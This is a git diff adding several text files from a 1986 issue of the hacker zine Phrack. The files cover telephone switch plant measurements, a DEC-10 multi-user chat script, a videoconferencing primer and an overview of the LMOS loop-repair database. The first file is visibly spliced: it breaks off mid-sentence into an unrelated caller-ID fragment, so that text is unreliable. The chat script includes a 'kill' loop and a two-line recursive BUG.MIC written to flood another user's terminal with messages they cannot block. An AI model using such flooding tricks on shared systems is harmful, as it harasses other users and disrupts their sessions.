+7. CAMA ANI Failures (CAMA ANI FAILURES): Counts the number of calls for which
+   ANI failure digit is received.
+
+8. Receiver Attachment Delay (RCVR ATT DELAY): Counts the number of times a
+   receiver connection was not made in 4 seconds.
+
+9. Receiver Attachment Delay Recorder (RADR Inhibit Usage): Counts tR described.
+
+This is rather simple when you think about it and is one example of how a once
+shattered network is working together.
+
+Some Sample CP ID Uses
+----------------------
+This can be used by large telephone ordering companies to instantly display a
+record of that persons credit, previous orders, etc... before the call is even
+answered on the attendant's terminal.
+
+When someone logs onto a computer, the originating # is listed on the user log
+along with the account name, etc... so that if---------
+
+The software EA phases may be initiated by the following sources:
+
+1. A failure by the system to answer an interrupt request
+2. An E-to-E cycle becoming excessive
+3. An E-to-E priority class frequency failure
+4. An excessive rate of interrupts
+5. Two successive data validation failures
+6. The time spent in a phase becoming excessive
+7. Aborting of a phase
+
+The number of EA phases is printed on the PM01 output message.
+
+Interrupts
+----------
+
+The number of various maintenance interrupts provides a picture of nonroutine
+maintenance action taken by the system. These interrupts are generally not as
+serious as a higher order EA phase, but they do interrupt normal call
+processing to correct possible hardware problems. A counts of these interrupts
+will give a good indication of the state of the systems' equipment. This is
+printed on the PM01 output message.
+
+Network Failures
+----------------
+
+The network failure counts are provided to give an indication of how well the
+network is completing and terminating calls. Each time a network failure
+occurs in the system an 'NT' output message is printed. The following are
+printed as part of the PM01 message:
+
+1. Supervisory Scan failure (SUPF)
+2. False cross and ground test failure (FCGF)
+3. Ringing Current Failure (RC)
+4. Low-line resistance failure (LLR)
+5. Power Cross test (PX)
+6. Restore verify failure count (RVFY)
+7. Showering line test failure (SHWL)
+8. Call Cutoff Failure (CO)
+
+================================
+=An Example of the PM01 Message=
+================================
+
+PM01
+201-232 PLANT MEASUREMENTS SUMMARY
+TUES
+10/17/86
+
+          SERVICE AFFECTING DATA
+
+          BASE MEASUREMENTS
+
+2           ORIG CALLS
+1           INC CALLS
+0           OUTG CALLS
+0           COIN CONTR FAILURES
+0           OMR SEIZ
+34          CAMA SEIZ
+0           AMA ENTRIES
+0           AIOD SEIZ
+0           CTX D-L SEIZ
+
+          SERVICE MEASUREMENTS
+
+0           HWR LOST CALLS
+0           HWR LOST BILLING
+0           COIN CONTR FAILURES
+0           AIOD-SBN BILLING
+0           DTST DELAYS
+0           CAMA LOST BILLING
+0           CAMA ANI FAILURE
+0           RCVR ATT DELAYS
+0           RADR INHIBIT USE
+2           FALSE STARTS
+
+[Note 201-232 is the area code-office code]
+
+============================================================
+=         (C) Copyright Sexy-Exy and PLP 1986              =
+============================================================
diff --git a/phrack9/7.txt b/phrack9/7.txt
new file mode 100644
index 0000000..00ff01b
--- /dev/null
+++ b/phrack9/7.txt
@@ -0,0 +1,190 @@
+                               ==Phrack Inc.==
+
+                    Volume One, Issue Nine, Phile #7 of 10
+
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+                                (512)-396-1120
+                            The Shack // presents
+                    A Multi-User Chat Program for DEC-10s
+                             Original Program by
+                                   TTY-Man
+                          Modified and Clarified by
+                               +++The Mentor+++
+                              October 6th, 1986
+
+Intro:  Unlike its more sophisticated older brother, the VAX, the DEC has no
+easy-to-use communication system like the VMS PHONE utility.  The following
+program makes use of the MIC file type available on most DECs.  Each user that
+wishes to be involved in the conference needs to run the program from his area
+using the .DO COM command.  The program can be entered with any editor (I
+recommend SED if you have VT52 emulation), and should be saved as COM.MIC. The
+program does not assume any specific terminal type or emulation.  You will
+have to know the TTY number of any person you wish to add to the conference,
+but this is available through a .SYSTAT command or .R WHO (see below.)
+SYSTAT
+This is an example of a SYSTAT to used to determine TTY#...
+Status of Saturn 7.03.2 at  7:27:51 on 03-Oct-86
+Uptime 40:41:14, 77% Null time = 77% Idle + 0% Lost, 9% Overhead
+27 Jobs in use out of 128.  27 logged in (LOGMAX of 127), 16 detached.
+       PPN#    TTY#      CURR     SIZE
+19    [OPR]       6      OPR      56+39     HB              18
+20     7,20       5      OPR      23+39     HB              24 $
+21  2501,1007    56      COMPIL   8+8       ^C            1:34 $
+22    66,1012    57      TECO     10+12     TI              39
+23    66,1011    62      1022     16+55     TI              36 $
+24    [SELF]     64      SYSTAT   23+SPY    RN               0 $
+26    [OPR]      DET     STOMPR   10+9      SL               2
+27 16011,1003    DET     DIRECT   17+32     ^C              30 $
+36    [OPR]      DET     FILDAE   17        HB            1:57
+
+        The TTY# is available in the TTY column... DET means that the user is
+detached and is unavailable for chatting...
+        Below is an example of .R WHO to obtain the same information...
+
+/- jobs in use out of 127.
+Job   Who        Line      PPN
+20  OPERATOR 20     5      7,20
+21  DISPONDENT     56   2501,1007
+22  ADP-TBO        57     66,1012
+23  ADP-MDL        62     66,1011
+24  THE MENTOR     64   XXXX,XXX
+27  GEO4440103    Det  16011,1003
+
+
+        In each case, I am on TTY# 64...
+
+        Anyway, use the following program, it's more convenient that doing a
+.SEN <tty> every time you want to send a message.   Also, to shut out an
+annoying sender, use .SET TTY GAG.  To remove, .SET TTY NO GAG... pretty
+simple, huh?
+
+
+start::
+!
+!Now in loop: 'a 'b 'c 'd 'e 'f
+!
+.mic input A,"Destination Terminal 1:"
+.if ($a="") .goto welcome
+.mic input B,"Destination Terminal 2:"
+.if ($b="") .goto welcome
+.mic input C,"Destination Terminal 3:"
+.if ($c="") .goto welcome
+.mic input D,"Destination Terminal 4:"
+.if ($d="") .goto welcome
+.mic input E,"Destination Terminal 5:"
+.if ($e="") .goto welcome
+.mic input F,"Destination Terminal 6:"
+.if ($f="") .goto welcome
+welcome::
+!Sending Hello Message...
+sen 'a Conference Forming on TTYs 'b 'c 'd 'e 'f ... DO COM to these to join'
+sen 'b Conference Forming on TTYs 'a 'c 'd 'e 'f ... DO COM to these to join'
+sen 'c Conference Forming on TTYs 'a 'b 'd 'e 'f ... DO COM to these to join'
+sen 'd Conference Forming on TTYs 'a 'b 'c 'e 'f ... DO COM to these to join'
+sen 'e Conference Forming on TTYs 'a 'b 'c 'd 'f ... DO COM to these to join'
+sen 'f Conference Forming on TTYs 'a 'b 'c 'd 'e ... DO COM to these to join'
+!
+!Type /h for help
+com::
+.mic input G,"T>"
+!Checking Commands.. Wait..
+.if ($g="/h") .goto help
+.if ($g="/k") .goto kill
+.if ($g="/l") .goto list
+.if ($g="/d") .goto drop
+.if ($g="/t") .goto time
+.if ($g="/w") .goto who
+.if ($g="/u") .goto users
+.if ($g="/q") .goto quit
+.if ($g="/r") .backto start
+.if ($g="/ac") .goto ack
+!Transmitting..  Wait..
+sen 'a 'g
+sen 'b 'g
+sen 'c 'g
+sen 'd 'g
+sen 'e 'g
+sen 'f 'g
+.backto com
+help::
+!
+!        Internal Commands
+!
+! /H  -> This Menu       /K -> Kill
+! /L  -> List Terminals  /U -> Users
+! /W  -> R who           /AC-> Alert Caller
+! /Q  -> Quit
+! /R  -> Restart/Add
+! /T  -> Show Date/Time
+! /D  -> Drop Caller
+!
+! All Commands must be in lower case.
+!
+.backto com
+list::
+!
+!Currently Connected To Terminals: 'a 'b 'c 'd 'e 'f
+!
+.backto com
+who::
+.revive
+.r who
+'<silence>
+.backto com
+users::
+.revive
+.r users
+'<silence>
+.BACKTO COM
+QUIT::
+!
+!Call The Shack... 512-396-1120 300/1200 24 hours
+!
+.mic cancel
+drop::
+!
+!Send Hangup Message:: Enter Terminal Number To Be Disconnected.
+!
+.mic input h,"Destination Terminal Number:"
+.sen 'h  <=- Communication Terminated at '<time> -=>
+.backto start
+ack::
+.mic input h,"Destination Terminal Number:"
+.sen 'h %TMRR -  Timeout Error, Response Required, Please ACKNOWLEDGE!
+.backto com
+kill::
+!
+!Send Message To Specific Terminal In A Loop
+.mic input n,"Are You Sure (Y/N)?"
+.if ($n="y") then .goto k1
+!%Function Aborted - Returning To Communication Mode.
+.backto com
+k1::
+.mic input h,"Destination Terminal Number:"
+.mic input n,"K>"
+dog::
+!Transmitting...CTRL-C Aborts!
+.sen 'h'n
+.backto dog
+time::
+!
+!Current Date : '<date>
+!Current Time : '<time>
+!
+.backto com
+
+
+        Wasn't that neat?  A feature that you can implement separately to be a
+pain in the ass is the recursive MIC that sends an annoying message to a
+specified terminal.  It is almost impossible for them to shut you out without
+logging out unless they are already gagged.
+        Just create a small MIC file called BUG.MIC... to do it in two lines,
+simply type...
+ .SEN <tty # goes here> Eat hot photons, Vogon slime!
+ .DO BUG
+
+        That's it!  I hope this comes in useful to someone out there!  Give us
+a call at The Shack... 512-396-1120  300/1200 baud, 24 hours a day... And a
+special welcome to all the feds who will doubtlessly be calling since the
+number appears in here... we have nothing to hide!
+                                        +++The Mentor+++
diff --git a/phrack9/8.txt b/phrack9/8.txt
new file mode 100644
index 0000000..883e67b
--- /dev/null
+++ b/phrack9/8.txt
@@ -0,0 +1,202 @@
+                               ==Phrack Inc.==
+
+                    Volume One, Issue Nine, Phile #8 of 10
+
+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
+
+                     "Introduction to Videoconferencing"
+
+                             by Knight Lightning
+
+                              Written On 10/3/86
+
+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
+Hi, KL here welcoming you to a look at Videoconferencing.   This is a
+relatively new field that definitely bears investigation as videoconferencing
+is only a step away from everyone having video communication in the home. Well
+enough is enough, I hope you enjoy the file --KL.
+______________________________________________________________________________
+
+Despite the growing use of videoconferencing, confusion still exists regarding
+what it can and cannot do.  This file should begin to help answer some of the
+questions about videoconferencing and perhaps formulate new ideas as well.
+Videoconferencing is not just one thing.  It takes several different forms and
+can be designed in many different ways.  Most of these ways are probably still
+waiting to be discovered.
+
+First of all, there are two main categories of videoconferencing.  There is
+Point-to-Point and Point-to-Multipoint.
+
+
+Point-to-point/Two-Way Videoconferencing
+----------------------------------------
+Two-way videoconferencing enables people to conduct meetings even though the
+participants are in separate locations.  Using interactive video and audio
+equipment, participants in one location can see, hear, and interact with
+colleagues in another location.
+
+The most familiar example occurs regularly on TV.  When a newscaster in
+Washington interviews a head of state on the opposite side of the world
+"live," that's point-to-point, full-motion, full-color videoconferencing.
+
+
+Point-to-multipoint/One-Way Videoconferencing
+---------------------------------------------
+The one-way videoconference allows an organization to present video
+information to large audiences in multiple locations at the same time.
+
+One-way videoconferences are very different from two-way videoconferences in
+purpose and in implementation.  Two-way videoconferences allow small groups in
+two, or possibly several, locations to interact audio-visually.  In contrast,
+one-way videoconferences are designed to provide a one-way audio-visual
+presentation of information from an originating site to audiences at numerous
+receiving locations.
+
+The remote "audiences" are not seen by the initiators of the presentation.
+However, since both types of videoconferencing take place in real time, live,
+the audience can participate over the phone.
+
+ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+There are two variations on the above listed categories of videoconferencing;
+Full-motion videoconferencing and freeze-frame videoconferencing.  Each
+carries its own set of system requirements and each accomplishes quite
+different tasks.
+
+
+                        FULL-MOTION Videoconferencing
+                        -----------------------------
+Full-motion videoconferencing is like watching television.  You can see
+participants in another location in color and in "real time" motion.  You can
+identify who is present (provided that they are within camera range) and who
+is speaking.  You can see facial expressions, hand gestures, and general body
+language.  Motion video is used primarily for images of people.
+
+
+Motion Transmission On Wideband Channels
+----------------------------------------
+There is far more information in moving pictures then in a still image.
+Consequently, the size of the communications channel required to transmit and
+receive motion is far greater than that required for a still image.
+
+Transmission of a television signal in its original analog form (as it would
+come from a TV camera), requires terrestrial television channels or a
+satellite transponder.  Terrestrial television channels are not readily
+available for occasional corporate use; satellite transponders are available.
+
+Most systems therefore, incorporate digital compression techniques to reduce
+the bandwidth required for motion videoconferences.  Example:  An image in
+motion is refreshed on a television screen 30 times per second.  This means
+that the bandwidth necessary to transmit the image is very high, usually 1.5
+megabits per second (Mbps).
+
+This bandwidth is beyond the capacity of the standard telephone cable.  A
+device called a "codec" digitizes the analog television signal and compresses
+it by eliminating redundant information.  Currently, codecs can reduce the
+bandwidth to 56 kilobits per second (Kbps) and it is hoped that this bandwidth
+can be compressed even further.
+
+The resulting signal can be transmitted over less than full bandwidth
+channels. The picture is of somewhat less quality than the original analog
+image, but more than sufficient for most meetings.
+
+
+                        FREEZE-FRAME Videoconferencing
+                        ------------------------------
+Freeze-frame videoconferencing is like a slide show.  It captures still images
+either in color or black-and-white.  Freeze-frame "stills" of people seem
+unnatural and can be distracting.  Yet, freeze-frame video is best for still
+images of three-dimensional objects such as a product or a part, and for
+charts, drawings, graphics, and specially prepared presentation material.
+
+
+Freeze-Frame Transmission On Narrow Band Channels
+-------------------------------------------------
+A freeze-frame system captures an image by stopping, or freezing any motion
+that might be present.  The image can be transmitted via analog or digital
+signals over narrow channels.  These channels are considerably narrower than
+those used for full-motion video conferencing.  In its simplest form,
+freeze-frame video can utilize ordinary telephone line transmission.  A single
+freeze-frame image will require at least 30 seconds to a minute or more for
+transmission.
+
+In some systems, the freeze-frame image is displayed line by line as it is
+received.  This creates a vertical "waterfall" effect or a horizontal scanning
+effect.  In other systems, the incoming lines of picture information are
+stored in a buffer until the completed picture can be displayed as a whole.
+In still other systems, an image emerges in successively better resolution as
+additional picture information is received.
+
+
+Enhancements To Freeze-Frame Video Systems
+------------------------------------------
+There are a number of ways to expand a freeze-frame video system's
+capabilities.  One enhancement is telewriting.  With a "pen" connected to a
+telewriting device, users can point out a portion of a freeze-frame video
+image, overlaying lines and markings in various colors that are displayed at
+all locations as they are drawn.  Some telewriting devices include stored
+geometric shapes, logos, and symbols that can be transmitted as overlays to a
+freeze-frame image.  Zoom capability enables close-up analysis of portions of
+a display.
+
+ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+               Personal Computers and Desktop Videoconferencing
+               ------------------------------------------------
+Personal computers are beginning to be increasingly used with freeze-frame
+videoconferencing.   PCs are used for control, for the creation of graphics,
+and for storage and retrieval of graphics material.  There are signs that this
+evolution towards desktop videoconferencing has already begun.
+
+The MINX (Multimedia Information Network Exchange) work station, recently
+announced by Datapoint Corporation, combines a camera and speakerphone with a
+high-resolution-color video graphics display screen.
+
+The MINX can be configured with Datapoint's Vista-PC or with the IBM PC, AT,
+or XT, in which case the PC monitor is replaced by the MINX.  A mode key on
+the workstation permits the user to shift between the video communications
+mode and the normal PC mode.
+
+Another indication of this revolution is provided by Northern Telecom
+(creators of DMS-100, 200, & 250), which recently added Meeting Communications
+Services (MCS) to its Meridian DV-1 voice/data system.  This option allows up
+to 24 participants to conduct simultaneous audio communication and up to eight
+participants to view, modify, and exchange data using Meridian M4000
+integrated terminals.
+
+A third and final example is the Luma phone from Luma Telecom.  This device,
+which uses regular phone lines, combines audio with black-and-white
+freeze-frame video on a three-inch-diagonal screen.  Strictly a telephone
+product, the Luma phone has no computer features and will not transmit data.
+For more information on the Luma phone, please see the November, 1986 issue of
+The Sharper Image catalog.
+
+ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+Videoconferencing is the way of the future and its only drawback is that of
+economic cost.   Increased use of videoconferencing will depend a lot on the
+adoption of the Integrated Services Digital Network (ISDN), a standard,
+all-digital communications service promised by the regional Bell Operating
+Companies (BOCs).
+
+ISDN will offer users 144 Kbs or more which can be allocated among various
+communications tasks--data, voice, or video--in whatever proportion is
+necessary.  This means that the available bandwidth could support simultaneous
+audio and video communication.
+______________________________________________________________________________
+
+References:
+----------
+"Electronic Meetings:  Substitutes With Substance?," by Sam Dickey, Today's
+ Office, July 1986.
+
+"Getting The Full Picture On Corporate Videoconferencing," by Marita Thomas,
+ Facilities Design & Management, June 1986.
+
+"The Lid Is Off ISDN," Tomorrow's Communication Connection, April 1986.
+
+"Videoconferencing;  An Alternative Solution," Corporate Informations Systems,
+General Electric (GE).
+______________________________________________________________________________
+Onto the next generation... --KL
+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
diff --git a/phrack9/9.txt b/phrack9/9.txt
new file mode 100644
index 0000000..dfa6551
--- /dev/null
+++ b/phrack9/9.txt
@@ -0,0 +1,360 @@
+                               ==Phrack Inc.==
+
+                    Volume One, Issue Nine, Phile #9 of 10
+
+                      Loop Maintenance Operations System
+
+                 Written by Phantom Phreaker and Doom Prophet
+
+                       Part I: A basic overview of LMOS
+
+                       Part II:Mechanized Loop Testing
+
+
+
+
+     Loop Maintenance and Operations System (LMOS) is a telephone company
+database that is a vital part in the act of repairing local loops (a customers
+telephone line). When you call the Repair Service to have your telephone
+service repaired, the information you give, as well as information and history
+on your local loop is processed through the LMOS database. This file shall
+examine several of the parts of LMOS, which is used by a number of different
+bureaus. The bureau that you reach when you dial your repair service is called
+the Centralized Repair Service Answering Bureau (CRSAB), and is usually
+reached by dialing (1)+611 or sometimes a POTS (Plain Old Telephone Service)
+number in areas where the X11 services aren't available. A CRSAB attendant is
+who you will deal with when reporting line trouble. You will tell the
+attendant the line number, and the types of problems you are experiencing on
+that line. The attendant will file a report concerning the basic information
+vital to line repair. Something called 'Front End Processors' form a
+'real-time' interface between the customer reporting the trouble, and the
+CRSAB attendant. 'Real-Time ' means that it is done on a continually changing
+basis, (ex. while the customer is reporting the trouble to an attendant,
+action is being taken.)
+
+     When a customer makes a trouble report to the CRSAB, the report is filed
+and sent through the Cross Front End, which is a link from the CRSAB to the
+LMOS system network. The trouble report is sent along a data link to the Front
+End, where a BOR (Basic Output Report) is requested. BOR's include line record
+information such as past trouble history and numerical values of MLT system
+tests. MLT is Mechanized Loop Testing. As LMOS is responsible for trouble
+reports, past trouble analysis, and other data related functions, MLT, which
+is connected to LMOS through a minicomputer in the Repair Service Bureau known
+as the MLT Controller, does the actual testing of subscriber loops. MLT
+hardware is located in the Repair Service Bureau. This hardware is linked to
+the LMOS system by way of an LMOS minicomputer, which may be in a remote
+location or with the LMOS central processor. Test trunks connect MLT hardware
+to the Wire Centers, which in turn connect with the subscriber loops.
+
+     The Databases of LMOS are connected via a high speed data link. The major
+divisions of data handled by LMOS are listed below.
+
+     Past Trouble History- This information is contained within the
+Abbreviated Trouble History (ATH) database and holds the most recent 40 days
+of history.
+
+     The Trouble History (TH) database contains histories of troubles for the
+day. This TH database is used to support TREAT (Trouble Report Evaluation and
+Analysis Tool) reports.
+
+     Line Record- These bases contain info about the customer's telephone
+circuit, whether it is POTS (for which there is a separate database), or SS
+(Special Service). Special Services numbers can be up to 16 characters plus
+the NPA or area code. The LMOS definition of an SS is any circuit having an
+identifier that is other than 10 digit numeric with NPA.
+
+     Also, the Cable (CA), Associated Number (AN), Telephone Answering service
+(TAS), and Central Office Equipment (COE) data bases contain line record
+information as well.
+
+     Miniline Record- There is one Miniline Record database for each Front End
+transaction processor. An example explaining this would be: A customer makes a
+trouble report to the CRSAB. The data sent through the Cross Front end to the
+Front End database, where a BOR is requested, is recorded and applied as
+status by the Miniline Record database to the Front End base. This helps to
+keep the LMOS Master Database in conjunction with the Front End bases.
+
+     Service Order History- This base contains a list of all lines changed
+during the day. The list is used for construction of Miniline Records to be
+sent to the front ends.
+
+     While there are many other databases within the LMOS system which serve a
+variety of functions, the bases listed above are the major ones.
+
+
+     The telephone network is divided into two major pieces, the loop portion,
+or the line from a Central Office to the customer premises; and the Toll
+portion. This is the network that connects long distance offices such as the
+Toll center and Primary center, and is also known as the Direct Distance
+Dialing or DDD network. The LMOS database is customer and loop oriented. The
+loop portion of the network is frequently altered and changed, as it is the
+customer's link with the DDD network. These changes are tracked by LMOS. This
+type of activity falls into two categories: Customer initiated service
+requests (when a customer makes a request or trouble report), and Bell
+Operating Company initiated plant changes.
+     'Plant' is the Outside Plant of cable which makes up the local loop.  A
+Customer initiated service request is for installation of new lines for the
+customer. The Universal Service Order or USO is the record of all these types
+of requests. USO's contain information such as customer listing, billing
+section, service and equipment section, and the Assignment section, which
+identifies the Central Office and outside plant (cable) facilities or lines.
+
+     A BOC initiated plant change is called a work or job order. This is when
+the BOC serving the area make additions and rearrangements to loops to meet
+customer requirements for service. Examples of work orders include the
+following:
+
+     Cable Throw-This order is when a cable pair is added to assist an
+existing cable in a high-growth area. This involves a change to the customer's
+cable and pair number. Cable Throw Summaries are printouts from this type of
+work order.
+
+     Area Transfer-This order is used when Wire Centers, or the point where
+customer cable pairs branch out from, have to be balanced to compensate for
+growth, as there will be a need for more subscriber loops. This often involves
+the change of a customer's number.
+
+     Service Orders pass through a BOC interface program to add RSB
+identifiers, which are repair unit numbers, needed by LMOS to translate data
+to a USO format.
+
+     The Automatic Line Record Update (ALRU) system is a system that updates
+the data bases of LMOS in response to a service order.
+
+     Work Orders can either involve a bulk task such as a large cable throw of
+400 pairs from cable 102 to cable 109, which would use a special bulk-oriented
+program in the Work Order process, or smaller tasks concerning a few cables,
+which would use the Enter Cable Change or ECC transaction.
+
+     Below is a summary of the Service Order flow through LMOS.
+
+1: The customer requests new or changed telephone service for their line.
+
+2: The request is entered into the BOC's service order network to be 'worked'.
+
+3: A request is made to assign facilities necessary to install or modify the
+   customer service.
+
+4: Facilities are assigned and information is sent to the service order
+   network.
+
+5: The service order network forwards information to do work to the installer,
+   or the RSB person who does the actual repair or modification on the line.
+
+6: Installer completes work, returns notice to service order distribution
+   network that service order has been completed.
+
+7: Completed service order goes to the BOC interface program to perform data
+   transactions for standard ALRU input.
+
+8: A day's worth of service orders are accumulated and read into the ALRU.
+
+9: Automatic Line Record Update automatically updates the LMOS host database.
+
+Next is a summary of the Work Order flow (for BOC initialized plant changes).
+
+1: The Distribution Service Design Center forwards requests for loop facility
+   additions or rearrangements to the Construction Maintenance Center to be
+   worked.
+
+2: If the request for work involves existing facilities (ones that are already
+   there), facility assignment information is requested.
+
+3: Facilities assigned to the Work Order are forwarded to the Construction
+   Maintenance Center.
+
+4: The Construction craft (installers) receives the work instructions.
+
+5: Work is completed and notices are sent to the CMC.
+
+6: A paper record of the completed work order is distributed to LMOS.
+
+
+     When service order and work order activities are combined, an estimated
+20 megabytes of data in the LMOS host data base is modified in some way every
+working day.
+
+
+                                 Part II-MLT
+
+     The basics of LMOS have been covered in part I. Part II will take a
+closer look at the Mechanized Loop Testing process and its relation with LMOS.
+
+     As mentioned previously, the equipment for the MLT system is located in
+or near the Central Office or End Office in which the customer loops
+terminate. The MLT equipment (being a third generation of automated testing
+system) is connected by test trunks through the switching system to customer
+loops. The MLT controller located in the Repair Service Bureau enables tests
+to be made on up to 12 local loops simultaneously, sets up the testing
+sequence, and controls the connection of test equipment to the loops. To make
+the appropriate tests, information in the LMOS data base(s) about the customer
+loop and station equipment is transmitted to the MLT controller when the test
+request is initiated. This information controls certain phases of each test
+and is used to analyze and decipher test results.
+     On command from the MLT controller, which will now be referred to as
+simply 'the Controller', the MLT system dials the number to be tested. If the
+line is busy, the cause is automatically determined (a conversation, phone
+off-hook, or a fault), and further tests are not made until the line is free.
+If the line is idle, the MLT system proceeds to make tests for purposes of
+maintenance and detection of faults in the loop.
+
+                              MLT test specifics
+
+* AC and DC (Alternating Current and Direct Current) measurements to determine
+if the loop is proper for the customer's station equipment, to determine the
+type and the extent of any electrical leakage through cable insulation, and to
+detect broken cable pairs and the location of the break in terms of distance
+from the CO where MLT is being used.
+
+* A 'Soak Test' to see if leakage will disappear after a high voltage is
+applied from the Central Office battery. The voltage dries up moisture, which
+is a frequent cause of leakage.
+
+* A Balance Check to reveal how susceptible the loop is to noise causing
+voltage, which would impair conversation over the line.
+
+* A measurement to tell whether CO battery voltage (voltage drops when the
+phone goes to an off-hook condition) and dial tone can be placed on the loop.
+
+     All MLT test measurements are converted by the MLT hardware to digital
+form and returned to the Controller for analysis. The analysis is based on the
+test results and the line-record info from LMOS.
+
+     Here is an example of how the Automated Repair Service Bureau (ARSB)
+works with the repair service attendants. A customer can't get a dial tone, so
+he calls the repair service from a neighbor's phone. An attendant who answers
+the call types the customer's phone number into a computer terminal. In
+response to this, LMOS displays the customer's name, address, class of service
+(in this case, it would be residential service), and information about any
+recent trouble on that loop. At the same time, LMOS causes the MLT system to
+test the loop. The CRSAB Attendant types in a description of the reported
+trouble. The MLT system returns the results of the tests on the line within a
+few seconds. Say, for example, the fault in question was a cable fault. This
+information would be displayed on the screen. The attendant would tell the
+customer that a visit is not needed, and that line will be repaired by a
+certain time. The data on the screen is automatically added to the LMOS
+database. A BOR is printed in the RSB serving the customer, and is screened to
+decide if it should be given to a dispatcher or a tester. The content of a BOR
+is explained in part one, and a diagram of a BOR is included below.
+
+
+**** BASIC OUTPUT REPORT *****                     PAGE- 01
+UNIT-99900000  10-08-86  0300P  TTN-0000110
+TN-999  5557009                                           CAT-CD
+SC-1FR    CS-RES     PUB     CPE-NO    SWC-         WKNG -0-
+SMITH, JOHN
+1000 NOWHERE LN.
+--RMKR--
+
+--TRBL--NDT-CCO-CBC-ALL CALLS
+--RCH--                                       REACH NBR-
+COMM-10-09-86  0700P VER-4   CALLED NBR-        OVER-
+                         STATUS-PS  10-09-77  0400P
+--STATUS NAR--
+SO DATE 03-27-85  SO# N0901
+
+--S/E--
+QTY-0001    USOC-1FRBC  KS-0000   LTD-   REF-
+--ASGM--
+OE-000B-010-09  VT-0146  RT-0500   NSTA-0001   BRG-N   NSV-N
+WC-999 F1   NPA-999    CA-   TT101    PR-109    PRU-    BP-10
+TEA-R1304   NOWHERE LN.
+
+--HIST--
+NO       REPORT SUBS         CLEARED       TH-KEY  TST  RPM  O/S } T } D } C }
+1  10-01-85  205P 0 10-02-77 0130P 10-02-77 620P   110  111   *  }330}320}320}
+   REPLACED INSIDE WIRE
+
+------------------------------------------------------------------------------
+
+MLT RESULTS     SUMMARY: OPEN OUT, DISTANCE TO OPEN=39,200 FT
+
+OPEN OUT
+ OPEN TIP
+ DISTANCE TO OPEN
+  39,200 FT (FROM C.O.)
+VALID DC RESISTANCE AND VOLT
+VALID LINE CKT CONFIGURATION
+CAN DRAW AND BREAK DIAL TONE
+
+CONTL-01 LTF-01 PORT-09 TRUNK-123 EQU-TPK000 BYD007 DLR002
+FRONT-END PROCESSING DATE AND TIME 10-08-76 0300P
+370 PROCESSING DATE AND TIME 10-08-86 0302P
+***END OF DATA***
+
+     This BOR tells that the trouble is an open tip wire 39,200 feet from the
+Central Office.
+
+     The first part of the BOR up to the --RMKR-- is the basic information
+section. The second part, from --TRBL-- to SO DATE is the trouble section. The
+next part, from --S/E-- to TEA-R1304 is the assignment section. The fourth
+part, from --HIST-- up to REPLACED INSIDE WIRE is the Abbreviated Trouble
+History section. The last part is the MLT test results section.
+
+     When a repair looks as if it may not be completed according to schedule,
+a Jeopardy Report is filed. Then, more repairmen are assigned to insure the
+line is repaired on time. After the repair is complete, the dispatcher retests
+the loop using MLT to verify that the trouble has been dealt with. The
+customer is notified, and the final disposition of trouble is entered into the
+LMOS database, where it is stored for future use and evaluation. (See also
+part I.)
+
+     If you had to sum up LMOS, it would be best summed up by saying LMOS is
+'A customer repair data management system.'
+
+
+Misc footnotes
+--------------
+Section one: Acronyms
+
+ALRU-Automatic Line Record Update
+AN-Associated Number
+ARSB-Automated Repair Service Bureau
+ATH-Abbreviated Trouble History
+BOC-Bell Operating Company
+BOR-Basic Output Report
+CA-Cable
+COE-Central Office Equipment
+CMC-Construction Maintenance Center
+CRSAB-Centralized Repair Service Answering Bureau
+DDD-Direct Distance Dialing
+ECC-Enter Cable Change
+LMOS-Loop Maintenance Operations System
+MLT-Mechanized Loop Testing
+POTS-Plain Old Telephone Service
+RSB-Repair Service Bureau
+SS-Special Service
+TAS-Telephone Answering Service
+TH-Trouble History
+TREAT-Trouble Report Evaluation and Analysis Tool
+
+
+
+Section two: Automated Testing Systems
+
+     MLT is the third generation of Automated Testing Systems. The first
+generation of testing equipment was something called the Line Status Verifier,
+which was manually operated, and not nearly as efficient as MLT or the second
+generation, the Automatic Line Verifier. The first and second generations of
+automated testing systems were both eventually built up to the MLT third
+generation type of system.
+
+
+-End of file-
+   8/19/86
+
+==============================================================================
+                       References and Acknowledgements
+==============================================================================
+'Automation improves testing and repair of customer loops' - Bell Labs Record
+'Automated Repair Service Bureau' - Bell System Technical Journal
+
+ And thanks to the following people for supplying other information:
+The Videosmith, The Marauder, Lock Lifter, Mark Tabas, and anyone else that we
+might have missed.
+
+ Sysops are allowed to use this file as long as nothing is changed. This file
+was written in 80 columns, upper and lower case.
+
+  If you notice any errors in this file please contact one of us and changes
+will be in order.